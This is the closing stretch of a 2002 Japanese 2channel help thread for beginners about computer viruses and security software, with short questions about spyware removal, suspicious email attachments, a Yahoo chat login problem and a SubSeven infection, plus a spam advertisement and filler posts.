973 :ひよこ名無しさん:02/07/17 14:40 ID:???
>>972
記念に残すのかな?w

974 :ひよこ名無しさん:02/07/17 14:53 ID:???
あの〜ノートンやウィルス・バスターでスパイ・ウェアをガードまたは削除出来ますか?

975 :ひよこ名無しさん:02/07/17 14:56 ID:???
>>974
Ad-Awareってのを使う!

976 :ひよこ名無しさん:02/07/17 20:32 ID:I/PrCLFU
今話題のiモード出会い系サイト今月遂に100万アクセス突破!!
     
          極楽出会いタイム
           3つの特典
       ・非会員でも書込みが除けるよ
       ・掲示板回覧は常時無料
       ・もちろんアクセスム無料(PCより回覧可)

          http://gdt.jp

       一度は見てね。すっごいよ



977 :ひよこ名無しさん:02/07/17 20:41 ID:???
>>976
ブラクラ

978 :ひよこ名無しさん:02/07/17 22:17 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

979 :ひよこ名無しさん:02/07/17 23:05 ID:qtnpR4Qm
見知らぬ人からメールがイパーイ来ます。件名は必ず英語です。
添付はword2000の特徴と〜.exeです。

980 :ひよこ名無しさん:02/07/17 23:07 ID:fIVdE548
すいません。
今日っていうかサッキヤフウチャットしていたら、
急にチャットが見れなくなり、いくらログインしてもダメです。
これって、何ですか?

981 :荒岸 ◆MONa3xWM :02/07/17 23:10 ID:???
>>980

マルチポストしないでね。

982 :ひよこ名無しさん:02/07/17 23:15 ID:???
>>980
とりあえずPC再起動

983 :ひよこ名無しさん:02/07/17 23:15 ID:fIVdE548
マルチポストって何ですか?
で、どうしたらイイノ?
アラシだったの??

984 :ひよこ名無しさん:02/07/17 23:18 ID:???
>>983
用語は調べよう!

985 :980:02/07/17 23:19 ID:fIVdE548
やったんですが、ダメです。
私のログインってもうダメなの???

986 :ひよこ名無しさん:02/07/17 23:21 ID:???
>>985
「マルチ」には回答を得る権利は喪失します。さよなら。

987 :荒岸 ◆MONa3xWM :02/07/17 23:21 ID:???
マルチポスト=同じ質問を複数の場所に投稿すること。
まぁ一種の荒らしみたいなもんです。yahooでも似たようなことしたからじゃない?

988 :ひよこ名無しさん:02/07/17 23:21 ID:???
>985
iavaが使える状態か?
あと自分のIDが生きてるか?
この2点を確認
でもyahoochatが落ちてるだけかも

989 :ひよこ名無しさん:02/07/17 23:23 ID:fIVdE548
idってドレですか?
多分、いきてないかも。

990 :荒岸 ◆MONa3xWM :02/07/17 23:24 ID:???
この調子じゃアク禁喰らってても不思議じゃないですね。

991 :ひよこ名無しさん:02/07/17 23:26 ID:???
>989
とりあえずyahoo mailにログインできるかどうか確かめれ

992 :ひよこ名無しさん:02/07/17 23:27 ID:???
>>990
荒タンに同意

993 :989:02/07/17 23:29 ID:fIVdE548
>991 ヤフ−メ−ルは開けました。

994 : :02/07/17 23:48 ID:JTvdqvNv
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.subseven22.html

のBackdoor.SubSeven22に感染しますた。検疫したんですがノートンでスキャンしたら
なにも出ませんでした。これって平気なんですか?教えてください。

995 :1000:02/07/17 23:49 ID:???
ばいばい〜♪♪♪(⌒∇⌒)ノ""フリフリ

996 :ひよこ名無しさん:02/07/17 23:50 ID:???
1000

997 :a:02/07/17 23:50 ID:mJNDQTCG
a

998 :aa:02/07/17 23:51 ID:mJNDQTCG
aaaa

999 :ひよこ名無しさん:02/07/17 23:52 ID:???
aaaaaaaaaa

1000 :ひよこ名無しさん:02/07/17 23:52 ID:???
999

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

298 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)